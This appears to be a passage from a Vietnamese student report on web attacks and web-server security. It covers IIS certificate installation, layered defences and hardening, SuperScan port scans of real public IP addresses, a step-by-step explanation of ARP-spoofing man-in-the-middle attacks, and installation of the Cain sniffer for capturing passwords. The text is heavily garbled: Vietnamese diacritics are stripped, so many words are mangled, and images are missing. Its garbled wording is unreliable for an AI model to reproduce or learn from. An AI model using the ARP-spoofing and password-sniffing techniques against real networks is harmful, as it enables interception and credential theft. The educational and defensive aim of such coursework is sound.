M Internet Explorer, vo Tools, chn Internet Options, qua tab Content, chnCertificates


62/98


62

Trong hp thoi Certificates, chn Import .


63/98


63

Hp thoi Welcome to the Certificate Import Wizard, chn Next .


64/98


64

Hp thoi File to Import, chn Browse, tr ng dn n C:\ca.cer, chnNext .

Hp thoi Certificate Store, chn Automatically select the certificate storebased on the type of certificate, chn Next, chn Finish .


65/98


66/98


66

Dn ni dung vo Notepad, save li vi tn cert.txt .

M Internet Information Services (IIS) Manager, chut phi Default Web Sitechn Properties- Trong ca s Default Web Site Properties, qua tab Directory Security, chnServer Certificate .


67/98


67

Hp thoi Welcome, chn Next- Hp thoi Pending Certificate R******, chn Process the pending r****** andinstall the certificate, chn Next .


68/98


68

Hp thoi Process a Pending Request, chn Browse, tr ng dn nC:\cert.txt .

Hp thoi SSL Port, gi mc nh port 443, chn Next 2 ln, chn Finish

Trong hp thoi Default Web Site Properties, chn View Certificate .


69/98


69

Kim tra Certificate c cp bi Verisign .


70/98


70

. Kim tra kt qu

-M Internet Explorer, truy cp https://www.MSOpenLab.com, kim tra truycp thnh cng.
https://www.msopenlab.com/https://www.msopenlab.com/


71/98


71

2. Cc cng c kho st v tim li webserver

Vnh ai bo vchung cho ton h thng mng (lp 1), gm c h

thng Web.

trin khai lp bo vu tin ny, cc t chc, doanh nghip c th trang

b mt thit ban ninh tch hp (UTM) gm nhiu tnh nng bo mt khc nhau

nh:

Tng la (Firewall) sgip ngn chn cc tn cng tng mng, loi

b cc hnh vi d qut cc im yu bo mt ca cc hiu hnh trn cc

my ch .

Thnh phn ngn chn xm nhp (IPS) gip loi bcc tn cng khai

thc cc im yu ca phn mm ng dng web, phn mm c s d liu, h

iu hnh... Ngoi ra cc thnh phn mng ring o (VPN) v thnh phnqut virus mc gateway sgip h thng c an ton hn.


72/98


72

- Tng la chuyn dng cho cc ng dng Web .

Sau khi xy dng vnh ai bo v chung, cn trang bthm mt tng la

chuyn dng cho cc ng dng web (lp 2). Tng la ng dng web ny s

kim tra v ngn chn cc tn cng khai thc im yu pht sinh trong qutrnh pht trin website. Ty thuc vo quy m ca t chc, doanh nghip

v/hoc ph thuc vo gi tr ca ti nguyn thng tin trn website m c th

c mt mc u t tng ng cho tng la ng dng web ny.

C 3 la chn:

-i vi cc website m phn ln l thng tin tnh (t thay i), khng

cha cc d liu quan trng cng nh khng c cc giao dch mua bn: cth trang b b sung module phn mm tng la cho ng dng web (nh

Web Intelligence ca Check Point) vo thit ban ninh tch hp UTM ni trn.

-i vi cc website c rt nhiu d liu quan trng mang tnh cht

sng cn ca t chc, doanh nghip, ng thi thng xuyn din ra cc giao

dch trc tuyn, i hi phi c an ton, sn sng cao: nn trang b mt

thit btng la chuyn dng cho ng dng web (nh gii php ca

NetContinuum, mt hng chuyn cung cp thit btng la chuyn dng cho

ng dng web).

--i vi cc website cung cp cc thng tin ni b hoc cng truy nhp

thng tin ca mt t chc, doanh nghip (Web Portal) cho php nhn vin kt

ni vo t bt cu v lm vic bt k thi gian no: ngoi vic trang b lp

bo v chung bng thit ban ninh tch hp, cc t chc, doanh nghip cng

cn xy dng mt cng truy nhp an ton n cc ti nguyn thng tin (v d

s dng thit b Connectra Web Security Gateway ca Check Point).

-i vi an ton h thng nhn chung, Firewall c th bo v h thng

my tnh chng li nhng kt nhp qua khnng ngn chn nhng phin

lm vic t xa (remote login).

-Ngn chn thng tin tbn ngoi (Internet) vo trong mng c bo

v, trong khi cho php ngi s dng hp php c truy nhp t do mng

bn ngoi.Firewall c th phc vnh mt cng ctheo di cc cuc tn cng vi


73/98


73

xu tbn ngoi nhm dbo khnng b tn cng trc khi cuc tn cng

xy ra.

Thit ban ninh tch hp hoc thit b chng xm nhp mng :

Sau khi u t hai lp bo vtrn, tng cng an ton bo mt thng tin,t chc, doanh nghip c th bsung thm mt thit ban ninh tch hp hoc

thit b chng xm nhp mng (IPS) chuyn dng (lp 3). Lp ny phn chia

mng bn trong thnh cc phn vng khc nhau v p dng cc chnh sch

ring cho tng phn vng mng nhm ngn chn cc tn cng c ngun gc

tbn trong mng v loi bcc tn cng c thvt qua tng la vo

vng cc my ch quan trng.

Mt s phng php bo v my ch eb Server

Cc my chWeb (Webserver) lun l nhng e da cho cc hacker tm kim

cc thng tin gi trhay gy ri v mt mc ch no . Him hoc thl bt

cci g t kiu tn cng t chi dch v, qung co cc website c ni dung

khng lnh mnh, xo, thay i ni dung cc file hay phn mm cha m

nguy him. Sau y l mt s phng php bo v my ch Web Server :

-t cc Webserver trong vng DMZ. Thit lp firewall khng cho cckt ni ti Webserver trn ton bcc cng, ngoi tr cng 80 (http), cng

443 (https) v cc cng dch vm ang s dng.

- Loi bton bcc dch vkhng cn thit khi Webserver ngay c

dch v truyn tp FTP (chgi li nu tht cn thit). Mi dch vkhng cn

thit s b li dng tn cng h thng nu khng c ch bo mt tt.

- Khng cho php qun tr h thng t xa, trkhi n c ng nhp

theo kiu mt khu chs dng mt ln hay ng kt ni c m ho.

- Gii hn sngi c quyn qun tr hay truy cp mc ti cao (root).

- To cc log file theo di hot ng ca ngi s dng v duy tr cc

log file ny trong mi trng c m ho.

- H thng iu khin log file thng thng c s dng cho bt k

hot ng no. Ci t cc by macro xem cc tn cng vo my ch. To

cc macro chy lin tc hoc t ra c th kim tra tnh nguyn vn ca filepasswd v cc file h thng khc. -Khi cc macro kim tra mt s


74/98


74

thay i, chng nn gi mt email ti nh qun l h thng.

-Loi bton bcc file khng cn thit khi th mc cha cc file

kch bn thi hnh: /cgi-bin.

-ng k v cp nht nh kcc bn sa li mi nht van ton,bo mt tcc nh cung cp.

- Nu h thng phi c qun tr txa, i hi mt c ch bo mt

nh bo mt shell, c s dng to ra mt kt ni bo mt. Khng s

dng telnet hay ftp vi user l anynomous (i hi mt username v password

cho vic truy cp) t bt csite khng c chng thc no. Tt hn, hy

gii hn s kt ni trong cc h thng bo mt v cc h thng bn trong

mng Intranet.

-Chy webserver trong cc th mc c t quyn truy cp v

quyn s dng, v vy chc ngi qun tr mi c th truy cp h thng

thc

-Chy server FTP theo ch anonymous (nu h thng cn) trong

mt th mc c t quyn truy cp, khc vi th mc c s dng bi

webserver.

-Thc hin ton b vic cp nht t mng Intranet. Duy tr trang web

ban u trn mi server trn h thng mng Intranet v to cc thay i v

cp nht y; sau mi y cc cp nht ny ln website qua mt kt ni

SSL. Nu thc hin iu ny hng gi, c thtrnh khnng server treo mt

thi gian di.

-Qut Webserver theo nh k vi cc cng cnh ISS hay nmap

tm kim l hng bo mt.-Trang b phn mm pht hin truy nhp tri php ti cc my ch,

t phn mm ny cnh bo cc hnh ng nguy him v bt cc session

ca chng li xem.. Thng tin ny c thgip bn ly c thng tin v

cch thc ph hoi mng, cng nh mc bo mt trong h thng ca bn.

-Tun thcc quy tc nht nh nu trn sgip cho Webserver

c bo v tt hn v ngi qun tr mng khng cn chu ni au u, lo


75/98


75

lng v vn an ton my chweb v an ton thng tin cho ton b h

thng.

* .Super Scan :

Chng ta s tin hnh kim tra thng tin trn mng bng cng c Super Scan.

C thhn, chng ta sdng Super Scan qut 1 IP v xc nh c l hng

c thxm nhp vo h thng thng qua cc port m phn mm xc nh m.

Cc bc tin hnh :

- Sau khi down Super Scan vmy, chng ta chy chng trnh nh

hnh di :

-Trong chng trnh c th Scan .

- Hostname/IP: in vo IP mun qut

-Hoc bn cng c th Scan c 1 range IP:

- Start IP : IP bt u

- End IP : IP kt thc

bt u qut ta click vo nt start gc tri bn di

Ngoi ra Super Scan cn c cc options khc nh:


76/98


76

- Host and Services Discovery: Dng thay i s port bn mun qut ca

IP hoc da trn danh sch Port list c sn.

- Scan Options: Thay i cc tham shost v services.

- Tools: Cc chc nng kim tra, tm kim thng tin ca 1 IP hoc domain.(Ping, whois, HTTP Header request,)

- Windows Enumeration: Thng tin m rng v IP hoc Domain

(NetBIOS,Mac address, Workstation,)

V d: Khi scan IP 210.245.31.17 ta s nhn c kt qunh hnh di:

y, IP 210.245.31.17 ang m tng cng 6 port: 5 TCP v 1 UDP

Theo nh lit k th cc port TCP ang ml:

- 21 : FTP


77/98


77

- 23 : Telnet

- 80 : web

- 443: SSL

- 8001: port ny do Trojan m- xem chi tit kt quhn, ta click vo View HTML Results.

Ty ta sxc nh c cc port m hacker c th li dng xm nhp

v c bin php secure cho cc port ny.

- Mt stnh nng khc ca Super Scan trong phn Tools ping, tracert hay

whois 1 domain

hnh trn ta thu c thng tin khi tracert domain www.itsea.net nh sau:

- Domain ny c IP: 207.210.81.150 v qua 16 hop, server dng hiu hnh

Linux, chy Apache 1.3.36 (unix) ,OpenSSL 0.9.7a

- Ngoi ra cn 1 s chc nng khc khai thc trit nhng thng tin v
http://www.itsea.net/http://www.itsea.net/


78/98


79/98


79

-y l mt dng tn cng rt nguy him, gi l Man In The Middle. Trong

trng hp ny ging nh bt my nghe ln, phin lm vic gia my gi

v my nhn vn din ra bnh thng nn ngi s dng khng h hay bit

mnh b tn cng.b. S lc qu trnh hot ng:

- Trn cng mt mng, Host A v Host B mun truyn tin cho nhau, cc

Packet sc a xung tng Datalink ng gi, cc Host phi ng gi

MAC ngun, MAC ch vo Frame. Nh vy trc khi qu trnh truyn D

liu, cc Host phi hi a chMAC ca nhau.

- Nu nh Host A khi ng qu trnh hi MAC trc, n s gi broadcast gi

tin ARP request cho tt ccc Host hi MAC Host B, lc Host B c

MAC ca Host A, sau Host B chtr li cho Host A MAC ca Host B (ARP

reply).

C 1 Host C lin tc gi ARP reply cho Host A v Host Ba chMAC ca

Host C, nhng li t a chIP l Host A v Host B. Lc ny Host A cngh

my B c MAC l C. Nh vy cc gi tin m Host A gi cho Host B u ba

n Host C, gi tin Host B tr li cho Host A cng a n Host C. Nu Host

C bt chc nng forwarding th coi nh Host A v Host B khng h hay bit

rng mnh b tn cng ARP.

- V d :

Ta c m hnh gm cc host


80/98


80

Attacker: l my hacker dng tn cng ARP

IP: 10.0.0.11

MAC: 0000.0000.1011

Server: l my b tn cngIP: 10.0.0.12

MAC: 0000.0000.1012

HostA

IP: 10.0.0.13

MAC: 0000.0000.1013

- u tin, HostA mun gi d liu cho Server, cn phi bit a chMAC

ca Server lin lc. HostA s gi broadcast ARP Request ti tt ccc

my trong cng mng LAN hi xem IP 10.0.0.12 (IP ca Server) c a

chMAC l bao nhiu.

- Attacker v Server u nhn c gi tin ARP Request, nhng chc

Server gi tr li gi tin ARP Reply li cho HostA. ARP Reply cha thng

tin vIP 10.0.0.12 v MAC 0000.0000.1012 ca Server.

- HostA nhn c gi ARP Realy t Server, bit c a chMAC ca

Server l 0000.0000.1012 s bt u thc hin lin lc truyn d liu n

Server. Attacker khng th xem ni dung d liu c truyn gia HostA

v Server.

My Attacker mun thc hin ARP attack i vi my Server. Attacker

mun mi gi tin HostA gi n my Server u c th chp li c

xem trm.

- Attacker thc hin gi lin tc ARP Reply cha thng tin v IP caServer 10.0.0.12, cn a chMAC l ca Attacker 0000.0000.1011.

- HostA nhn c ARP Reply ngh rng IP Server 10.0.0.12 c a ch

MAC l 0000.0000.1011. HostA lu thng tin ny vo bng ARP Cache v

thc hin kt ni.

- Lc ny mi thng tin, d liu HostA gi ti my c IP 10.0.0.12 (l my

Server) s gi qua a chMAC 0000.0000.1011 ca my Attacker.


81/98


81

3 .S dng phn mm CAIN

- Phn mm Cain l phn mm sniffer hiu qu hin nay. Cung cp tnh

nng ca cain c thcho php sniffer c cung cp thng tin b mt trong h thng mng LAN nh password e-mail, password dch v ftp,

telnet,

a. Yu cu v phn cng :

cng cn trng 10 Mb

Hiu hnh Win 2000/2003/XP

Cn phi c Winpcap

b. Ci t:

- Chn Next .


82/98


82

- Chn next.

- Chn Finish.

Trong qu trnh ci Ct i hi ta phi ci t km bth vin WinPcap.


83/98


83


84/98


84


85/98

n mn hc Lp trnh web

da tim hieutan cong va bao mat web - duong hoang dai - nguyentuandat

Documents